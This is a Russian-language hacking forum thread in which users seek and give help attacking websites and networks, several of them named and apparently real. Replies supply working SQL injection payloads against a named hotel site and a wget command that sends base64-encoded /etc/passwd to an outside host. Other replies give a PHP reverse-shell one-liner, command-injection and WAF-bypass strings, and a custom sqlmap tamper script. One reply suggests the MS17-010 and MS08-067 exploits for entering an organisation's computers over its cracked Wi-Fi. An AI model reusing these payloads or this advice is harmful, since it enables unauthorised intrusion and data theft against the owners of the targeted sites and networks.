Лью шелл, когда заходишь на него, вводишь пасс, и получаешь пустую страницу или 503 код
WAF? Как можно обойти?


Похоже на проблему WSO2 с PHP7, нужно выпилить set_magic_quotes_runtime.

kacergei
02.04.2019, 19:12
Можете пожалуйста подсказать по данной sql-injection:


Code:
igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE% D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0 %B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1

Параметр: width

Через sqlmap не удалось что с тамперами, что без

Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется

обратил внимание что фильтрует AND, OR и что то еще =( хотя могу ошибаться

Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila

А то уже третий хост попадается этот и как в стену((

Jimio
02.04.2019, 19:26
crlf said:
↑ (https://antichat.live/posts/4297996/)
Похоже на проблему WSO2 с PHP7, нужно выпилить
set_magic_quotes_runtime
.


Запаковал нормально и все заработало. Спасибо.

auth_root
03.04.2019, 18:47
Есть os command inj в пост запросе, выводит uname -a : "Linux web***.******.com 2.6.32-696.16.1.el6.x86_64 #1 SMP Wed Nov 15 16:51:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux""

pwd выводит норм полный путь.

ls -la выводит только первый файл "-rw-r--r--. 1 try_home try_home 25 2018-11-11 12:27 index.php" хотя файлов в дире много.

И так из любой папки, только один показывает.

wget и curl ничего не качают, хотя они установлены и работают (м.б. нет прав у меня?) файлы создавать не могу, читать не могу...

cat "filename" показывает только последнюю строчку файла, "?>", если я пытаюсь с флагом -b, то показывает кол-во строк в файле и все. =(

cat /etc/passwd -> "oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin" Тоже блин одна строка.

whoami говорит что я daemon (= Чего делать то?

Никакие файлы ни прочитать полностью, ни отредактировать не могу. echo >> тоже не работает.

Нету скилла.

Прошу помощи, куда копнуть.

Премного благодарен.

BillyBons
03.04.2019, 20:16
auth_root said:
↑ (https://antichat.live/posts/4298324/)
Есть os command inj в пост запросе, выводит uname -a : "Linux web***.******.com 2.6.32-696.16.1.el6.x86_64 #1 SMP Wed Nov 15 16:51:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux""
pwd выводит норм полный путь.
ls -la выводит только первый файл "-rw-r--r--. 1 try_home try_home 25 2018-11-11 12:27 index.php" хотя файлов в дире много.
И так из любой папки, только один показывает.
wget и curl ничего не качают, хотя они установлены и работают (м.б. нет прав у меня?) файлы создавать не могу, читать не могу...
cat "filename" показывает только последнюю строчку файла, "?>", если я пытаюсь с флагом -b, то показывает кол-во строк в файле и все. =(
cat /etc/passwd -> "oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin" Тоже блин одна строка.
whoami говорит что я daemon (= Чего делать то?
Никакие файлы ни прочитать полностью, ни отредактировать не могу. echo >> тоже не работает.
Нету скилла.
Прошу помощи, куда копнуть.
Премного благодарен.


Конвейер | работает ? С ним можно и списки файлов, и содержимое построчно перебрать.

auth_root
03.04.2019, 20:33
BillyBons said:
↑ (https://antichat.live/posts/4298335/)
Конвейер | работает ? С ним можно и списки файлов, и содержимое построчно перебрать.


Покажи на примере плз, как. %7c работает.

BillyBons
03.04.2019, 21:26
auth_root said:
↑ (https://antichat.live/posts/4298337/)
Покажи на примере плз, как. %7c работает.


ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи

l1ght
03.04.2019, 22:06
auth_root (https://antichat.live/members/112881/), длина строки ответа различается, можешь попробовать

cat index.php | base64

или перенаправить вывод на свой сервер

wget "http://hek.ru/?log={`cat /etc/passwd | base64`}"

но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше

auth_root
04.04.2019, 00:05
BillyBons said:
↑ (https://antichat.live/posts/4298343/)
ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи


Да, так работает, спасибо. =) Чуствую спалят раньше, чем я переберу эту огромную массу информации построчно.


l1ght said:
↑ (https://antichat.live/posts/4298345/)
auth_root (https://antichat.live/members/112881/)
, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget "
http://hek.ru/?log=
{`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше


wget (maybe в моих кривых руках) не работает. Base64 так же выводит всего по одной строке еще и обрезаной. Как запилить бэкконнект? Добавить в файл? Не редачит он существующие, пустые не создает, wget и curl не воркает у меня. Я Очень давно этим не занимался. Тут подбили края

BabaDook
04.04.2019, 00:18
l1ght said:
↑ (https://antichat.live/posts/4298345/)
auth_root (https://antichat.live/members/112881/)
, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget "
http://hek.ru/?log=
{`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше


Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе

auth_root
04.04.2019, 00:27
BabaDook said:
↑ (https://antichat.live/posts/4298361/)
Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе


Как реализовать, покажите плз неумному =(

hibar1Xs
04.04.2019, 04:07
auth_root said:
↑ (https://antichat.live/posts/4298360/)
Как запилить бэкконнект?




Code:
php -r '$sock=fsockopen("127.0.0.1",65536);exec("/bin/sh -i &3 2>&3");'

Тот_самый_Щуп
04.04.2019, 09:30
Ну вообще, там речь про системные команды, а не php RCE )

Octavian
04.04.2019, 22:42
Чем искать NoSQL Injection сканер бурпа умеет? есть расширения под ним?

kacergei
05.04.2019, 02:09
kacergei said:
↑ (https://antichat.live/posts/4298104/)
Можете пожалуйста подсказать по данной sql-injection:

Code:
igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE% D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0 %B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1

Параметр: width
Через sqlmap не удалось что с тамперами, что без
Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется
обратил внимание что фильтрует
AND
,
OR и что то еще =( хотя могу ошибаться
Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila
А то уже третий хост попадается этот и как в стену((


Может кто подскажет по данному вопросу?

PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво(

А то подобных тем не видел в услугах(

hibar1Xs
05.04.2019, 19:56
kacergei said:
↑ (https://antichat.live/posts/4298641/)
Может кто подскажет по данному вопросу?
PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво(
А то подобных тем не видел в услугах(



Фрагментированные SQL иньекции

HTTP Parameter Pollution
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf

https://www.ptsecurity.com/upload/c...s/Ю.Гольцев_Уязвимости_web_сло ные_случаи.pdf (https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/%D0%AE.%D0%93%D0%BE%D0%BB%D1%8C%D1%86%D0%B5%D0%B2_ %D0%A3%D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%BE%D1%81%D 1%82%D0%B8_web_%D1%81%D0%BB%D0%BE%D0%B6%D0%BD%D1%8 B%D0%B5_%D1%81%D0%BB%D1%83%D1%87%D0%B0%D0%B8.pdf)

crlf
15.04.2019, 19:16
man474019 said:
↑ (https://antichat.live/posts/4300950/)
hi all
os command injection in post data, mod_sec waf..when try echo test, it works
but when try uname, ls, pwd, dir waf deletes command, what real advice ?


Hi, try this:


Code:
/b?n/?s /
/b?n/un?m?
/?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h

crlf
16.04.2019, 17:08
man474019 said:
↑ (https://antichat.live/posts/4301045/)
response


It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:


Code:
;id;
`id`
;sleep 100;
`sleep 100`
uname${IFS}-a
echo$IFS"bHMgLWxh"|base64$IFS-d|sh
`echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`

and so on...

Also check this (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection).

BabaDook
16.04.2019, 19:19
man474019 said:
↑ (https://antichat.live/posts/4301045/)
@crlf (https://antichat.live/members/285197/)
thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((
request
response


А ты чего ожидал от твоей команды ?

xmp
23.04.2019, 12:34
Подскажите как загрузить шелл через SQLi

union based иньекция

FILE_PRIV = Y (5.5.60-log)

Включен --secure-file-priv соответственно into outfile не рабоатет.

xmp
23.04.2019, 16:04
man474019 said:
↑ (https://antichat.live/posts/4302846/)
hi
see if magic_quotes_gpc ON or OFF
you must find writable path/folder to upload your shell
and also you can try LOAD DATA INFILE


Yes i can upload file data to table, but im looking for way write data to file.

magic_quotes_gpc = off

BabaDook
23.04.2019, 17:35
xmp said:
↑ (https://antichat.live/posts/4302831/)
Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.


попробуй переопределить, но скорее всего никак

xmp
23.04.2019, 17:57
BabaDook said:
↑ (https://antichat.live/posts/4302873/)
попробуй переопределить, но скорее всего никак


Запись на включение находится в /etc/my.cnf

Верно понимаю что ты имеешь в виду?


mysql>
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv |
/var/lib/mysql-files/
|

BabaDook
23.04.2019, 18:05
xmp said:
↑ (https://antichat.live/posts/4302878/)
Запись на включение находится в /etc/my.cnf
Верно понимаю что ты имеешь в виду?


https://bugs.mysql.com/bug.php?id=50373

WallHack
30.04.2019, 20:14
Есть уязвимость, Cross site scripting в куках

GET site/eta.php HTTP/1.1

Referer: https://www.google.com/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21

Cookie: cache=Cross site scripting


Есть пример эксплуатации такой уязвимости ?

vladF
30.04.2019, 22:50
Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)

BabaDook
01.05.2019, 00:27
vladF said:
↑ (https://antichat.live/posts/4304456/)
Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)


В чём проблема?

BabaDook
01.05.2019, 15:04
man474019 said:
↑ (https://antichat.live/posts/4304517/)
any help ??


подробней пиши

winstrool
01.05.2019, 15:42
man474019 said:
↑ (https://antichat.live/posts/4304517/)
any help ??


вытаскивать по одному символу через функцию mid() или substring(), а если конкретней пример, то я бы переделал конструкцию запроса

BabaDook
01.05.2019, 16:26
Я бы убрал бы груп контакт, действитель, еррор вектор не выводит в один запрос длинные пароли, надо использовать функцию

substring(1,10) дальше substring(11,21) итд

BabaDook
01.05.2019, 16:38
https://alushta-hotel.com.ua/room.php?id=1' and extractvalue(0x0a,concat(0x0a,(select substring(version(),1,2))))+--+-

https://alushta-hotel.com.ua/room.php?id=1' and extractvalue(0x0a,concat(0x0a,(select substring(version(),3,5))))+--+-

Sensoft
15.05.2019, 04:00
Если есть XSS куках что можно сделать ?

LexProm
15.05.2019, 21:43
Sensoft said:
↑ (https://antichat.live/posts/4306996/)
Если есть XSS куках что можно сделать ?


Ничего , разве что как-то заставить юзера прописать руками туда твой скрипт

RWD
16.05.2019, 00:25
Sensoft said:
↑ (https://antichat.live/posts/4306996/)
Если есть XSS куках что можно сделать ?


да, зарепортить на hackerone

обычно в нормальных программах это стоит 1000+ уе

Тот_самый_Щуп
16.05.2019, 04:23
RWD said:
↑ (https://antichat.live/posts/4307216/)
да, зарепортить на hackerone
обычно в нормальных программах это стоит 1000+ уе


Запросят обоснование вектора атаки, а с ним тяжело...

winstrool
16.05.2019, 13:04
--thread=1 ?

BabaDook
16.05.2019, 17:17
man474019 said:
↑ (https://antichat.live/posts/4307289/)
I also tested with that, but same result
https://pasteboard.co/IeWRofBn.jpg


С чего вы взяли что должен быть результат. Кроме того что сайт русский, или что-то с кодировкой я не вижу ничего.

BenderMR
24.05.2019, 16:08
Есть inject с выводом. все стандартно:


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Найти количество колонок не проблема:


Code:
http://site.com/eng/index.php?param1=13123&param2=4aasd&param3=dasd&param4=28183 order by 1

Когда пытаюсь провести union редиректит на index, но если использовать неправильно количество колонок, то опять ошибка:


Code:
The used SELECT statements have a different number of columns

Есть у кого идеи как это обойти, потому что не могу ничего придумать.

Кстати, когда использую невалидный параметр тоже происходит редирект.

BenderMR
24.05.2019, 22:05
man474019 said:
↑ (https://antichat.live/posts/4308698/)
you can stop redirect with Opera 12 and try your vector again or in sqlmap with --answer="redirect=N" flag


Alright. Is there any way to install Opera 12 on Kali? cause I tried all kinds of way, but still no luck or do you run it on Windows?

Sqlmap is not an option, because there are couple filters, which should be bypassed manually first.

BabaDook
24.05.2019, 22:33
BenderMR said:
↑ (https://antichat.live/posts/4308690/)
Есть inject с выводом. все стандартно:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Найти количество колонок не проблема:

Code:
http://site.com/eng/index.php?param1=13123&param2=4aasd&param3=dasd&param4=28183 order by 1

Когда пытаюсь провести union редиректит на index, но если использовать неправильно количество колонок, то опять ошибка:

Code:
The used SELECT statements have a different number of columns

Есть у кого идеи как это обойти, потому что не могу ничего придумать.
Кстати, когда использую невалидный параметр тоже происходит редирект.


Много чего может быть, двойной запрос, ваф.... может ошибка и не должна пропадать

BenderMR
24.05.2019, 23:07
BabaDook said:
↑ (https://antichat.live/posts/4308754/)
Много чего может быть, двойной запрос, ваф.... может ошибка и не должна пропадать


Окей можно пойти по error based или extractvalue, но скобки фильтруются таким образом: когда закрытая пара -> срабатывает фильтр; когда одна или незакрытая, то все норм.

По этому не могу ни одну функцию вызвать. Сталкивался с таким? Как такое вообще обойти может где то писали

LexProm
26.05.2019, 18:07
Возможно кто-то сталкивался, проблема в том что переданные параметры проходят сначала через функцию на стороне сервера которая поднимает их в верхний регистр

Получаеться при передаче 'select * from table1' бд получает 'SELECT * FROM TABLE1', так как по дефолту бд чувствительно к регистру букв в названии таблиц возникает ошибка так как TABLE1 не существует, существует только table1

mail156
26.05.2019, 18:35
Что такое javascript-скрипт из url b.scorecardresearch.com ?

Тот_самый_Щуп
26.05.2019, 18:37
LexProm said:
↑ (https://antichat.live/posts/4308989/)
Возможно кто-то сталкивался, проблема в том что переданные параметры проходят сначала через функцию на стороне сервера которая поднимает их в верхний регистр
Получаеться при передаче 'select * from table1' бд получает 'SELECT * FROM TABLE1', так как по дефолту бд чувствительно к регистру букв в названии таблиц возникает ошибка так как TABLE1 не существует, существует только table1


Попробовать только select * from `table1` или select * from %74%61%62%6C%65%31

Но в целом, вариант тупиковый. Если у кого есть годные решения, сам с удовольствием выслушаю.

LexProm
26.05.2019, 19:05
Gorbachev said:
↑ (https://antichat.live/posts/4308998/)
Попробовать только select * from `table1` или select * from %74%61%62%6C%65%31
Но в целом, вариант тупиковый. Если у кого есть годные решения, сам с удовольствием выслушаю.


Пробовал, в первом случае он так же поднимает в верхний регистр и обращаеться к `TABLE1` во втором он сначала декодирует потом так же апает

DezMond™
29.05.2019, 20:53
ХЕЛП


Code:
https://www.aknw.de/menu-oben-jobboerse-architektenliste/jobboerse/index.php?eID=getJobData&sSearch=&sSearch_6=&bRegex_6=false&iSortCol_0=0&iSortingCols=1&bSortable_0=true&bSortable_6=false&active=1&sEcho=2&iColumns=7&iDisplayLength=25&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch_0=&bRegex_5=0&pi=281&sSortDir_0=DESC

Тот_самый_Щуп
04.06.2019, 23:31
Подскажите, есть ли на текущий момент вариант провести Mysql иньект в лимите, если версия Mysql > 5.6 ? Трюк с procedure analyse не прокатывает, но возможно есть ещё какие техники? Буду признателен, если кто подскажет.

RWD
09.06.2019, 02:17
есть тут что то?

http://images.smartertravel.com/files/../Gemfile

madam
19.06.2019, 10:08
После каждого SQL запроса

Session halted.

Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно

b3
19.06.2019, 10:54
madam said:
↑ (https://antichat.live/posts/4314123/)
После каждого SQL запроса
Session halted.
Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно


Все заголовки отлавливать и использовать, возможно CSRF токен мешает

AngelEyes
20.06.2019, 15:09
Parameter: useremail (POST)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI

Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)

Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))

[ERROR] invalid character detected. retrying..

[WARNING] increasing time delay to 4 seconds

RWD
20.06.2019, 17:11
AngelEyes said:
↑ (https://antichat.live/posts/4314405/)
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds


если есть такое, вполне возможно есть и другие скули, поищите хорошо.

BabaDook
20.06.2019, 17:13
AngelEyes said:
↑ (https://antichat.live/posts/4314405/)
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds


Oob

AngelEyes
20.06.2019, 18:59
BabaDook said:
↑ (https://antichat.live/posts/4314432/)
Oob


Если это ответ,то можно поподробней=)

AngelEyes
20.06.2019, 19:02
RWD said:
↑ (https://antichat.live/posts/4314431/)
если есть такое, вполне возможно есть и другие скули, поищите хорошо.


Пара разных пейлоадов,пробовал через оба,но итог один и тот же

BabaDook
20.06.2019, 19:10
AngelEyes said:
↑ (https://antichat.live/posts/4314456/)
Если это ответ,то можно поподробней=)


https://www.acunetix.com/blog/artic...ction-vulnerability-testing-added-acumonitor/ (https://www.acunetix.com/blog/articles/blind-out-of-band-sql-injection-vulnerability-testing-added-acumonitor/)

RWD
21.06.2019, 02:13
AngelEyes said:
↑ (https://antichat.live/posts/4314456/)
Если это ответ,то можно поподробней=)


ищи скули с вектором error based/Union если тебе слить нужно базу пользователей, через слепую сливать смысла нет. Проверяй файлы, POST/GET запросы, скрытые папки, всегда есть надежда на то что есть.

BabaDook
27.06.2019, 12:33
Blood_Aurora said:
↑ (https://antichat.live/posts/4315908/)
Open server защищает от sql иньекций? Суть в том что я поставил на локальный сервер потенциально уязвимую страницу с базой данных, но когда я изменял запрос то страницы мне не выдавала того что должна была. Тоесть все работает но так как должно нет, хотя я в коде ничего не трогал, все исходники не изменялись.


Не т, не защитит опенСервер. Он вообще для другого. Остальной текст я не понял.

Br@!ns
15.07.2019, 10:01
Нужно залиться в магенто2 не самой свежей версии. Имея админку, пхпмуадмин с корректными данными, локальную читалку, и стандартный набор модулей, есть какие нибудь варианты?

Octavian
17.07.2019, 12:14
Есть сайт на Laravel есть вроде XSS хранимая, и другие теги пропускает а меняет на [removed] пробовал много векторов, помогите приватно

b3
17.07.2019, 13:46
Публично могём:

1) https://gist.github.com/JohannesHoppe/5612274

2) https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Octavian
17.07.2019, 15:29
b3 said:
↑ (https://antichat.live/posts/4319758/)
Публично могём:
1)
https://gist.github.com/JohannesHoppe/5612274
2)
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet


Смотрел и пробовал оба, но там очень жестко и хитро уберает все

BabaDook
17.07.2019, 22:28
Вроде можно без скрипт вызвать алерт

Octavian
18.07.2019, 14:50
Есть XSS но этот URL Encode все портит, что можно сделать?

URL: https://site/news/asd?fbclid='-alert(1)//


Code:
onclick="Share.vk('https://site/news/asd?fbclid=%27-alert(1)//')"

Baskin-Robbins
22.07.2019, 09:59
o314um said:
↑ (https://antichat.live/posts/4320464/)
И так ситуация:
Есть выполнение команд в базе mssql и выврд через тайм инжекшн. ОС windows
можно выполнять команды cmd. Там есть IIS и папка wwwroot. Но как узнать IP адрес внешний,чтобы обратиться к www, web-шеллу? как узнать внешний ИП на котором стоит mssql?


проскань подсеть на 1433 порт но это не факт

раз есть возможность выполнять команды - пропингуй себя в логах потом смотри ip(тоже не точно)

можно залить обратный шелл и никуда обращаться не нужно будет - тоже не факт

можно попробовать прочитать скрипты, там должна быть инфа для подключения к базе(а может и нет)

BenderMR
24.07.2019, 03:26
Подскажите как обойти mod security для LFI


Code:
http://www.manyforex.com/page.php?X=....//etc/passwd&C=ID-000013&Y=ID-00001223&Z=Particular&Q=MANYForex

BenderMR
02.08.2019, 13:18
Есть интересный скуль, но когда пробую вытянуть таблицы выдается ошибка, что у юзера бд нет прав:


Code:
SELECT command denied to user 'user'@'localhost' for table 'tables'

Кто то сталкивался с таким? Eсть ли какие то варианты продвинуться дальше?

Octavian
05.08.2019, 19:36
Чеп прикрыть USB технике что в офисе, не разбирая, не испортив?

Octavian
06.08.2019, 00:06
Где найти нормальной информации про защиту инфы в компаний?

RWD
06.08.2019, 01:40
Octavian said:
↑ (https://antichat.live/posts/4323658/)
Где найти нормальной информации про защиту инфы в компаний?


пообщаться с опытным CISO большой компании.

на линкедине полно контактов.

AngelEyes
07.08.2019, 13:01
Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)

а то при сливе выдает:

| Email | LoginPassword |

+-------+---------------+

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке

P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))

karkajoi
07.08.2019, 14:47
AngelEyes said:
↑ (https://antichat.live/posts/4324042/)
Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)
а то при сливе выдает:
| Email | LoginPassword |
+-------+---------------+
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке
P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))


Руками надо смотреть на что ругается ВАФ и потом уже искать обход.

Почитай и попробуй варианты

https://hydrasky.com/network-security/sql-injection-bypass-cheatsheet/

http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html

https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

highmoore
11.08.2019, 08:54
Прошу помощи в раскрутке скули

Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре

Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф

Ругается на слово union, select пропускает

Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше

Ошибка вафа :

You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь

winstrool
11.08.2019, 13:54
highmoore said:
↑ (https://antichat.live/posts/4324759/)
Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь


Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример

.SpoilerTarget" type="button">Spoiler
#!/usr/bin/env python

"""

Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)

See the file 'doc/COPYING' for copying permission

"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():

pass

def tamper(payload, **kwargs):

"""

........

"""

if payload:

payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")

payload = payload.replace("table_schema", "/*!12345%74able_schema*/")

payload = payload.replace("table_name", "/*!12345%74able_name*/")

payload = payload.replace("UNION", "/*!12345%75NION*/")

payload = payload.replace("SELECT", "/*!12345%73ELECT*/")

payload = payload.replace("SCHEMA", "%73CHEMA")

payload = payload.replace("schema", "%73chema")

payload = payload.replace("from", "/*!12345from*/")

return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"

highmoore
12.08.2019, 03:32
winstrool said:
↑ (https://antichat.live/posts/4324784/)
Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример
Spoiler
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (
http://sqlmap.org/
)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
........
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("UNION", "/*!12345%75NION*/")
payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
payload = payload.replace("from", "/*!12345from*/")
return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"


Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось

С которым у меня не так много опыта, буду благодарен за любую помощь

SovaGSN
12.08.2019, 18:05
Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели

winstrool
12.08.2019, 22:18
SovaGSN said:
↑ (https://antichat.live/posts/4324976/)
Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели


попробуй заюзать эксплоиты ms17-010, ms08-67, очень сомневаюсь что там винда пропатчена

AngelEyes
13.08.2019, 01:09
sqlmap.py -u "https://******/client/login" -p "email" --risk="3" --level="3" --method="POST" --data="--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22email%22

test

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22password%22

N3tsp@rker-

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22action%22

login

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22submit%22

Sign In

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22hash%22

3a4bf5ec9dcc971c08509bf8f5ca5cf1daac489a

--3e306551ffbd4492975ea8cd2a9917cc--

" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --headers="Accept:application/json, text/javascript, */*; q=0.01\nContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryOln7Ytw9vsNImdiP\nOrigin:https://*****\nX-Requested-With:XMLHttpRequest\nReferer:https://****/terms" --dbms="MySQL" --batch

Подскажите как это всё в мапу упаковать?Сама мапа не находит уяз на сайте,пришлось спаркером воспользоваться,команда выдает то,что выше,но мапа так это не хавает

winstrool
13.08.2019, 12:39
положи весь запрос в файлик и обратись к нему через параметр -r file.txt

M.Billar
13.08.2019, 19:46
Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.

Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: alert(document.cookie)

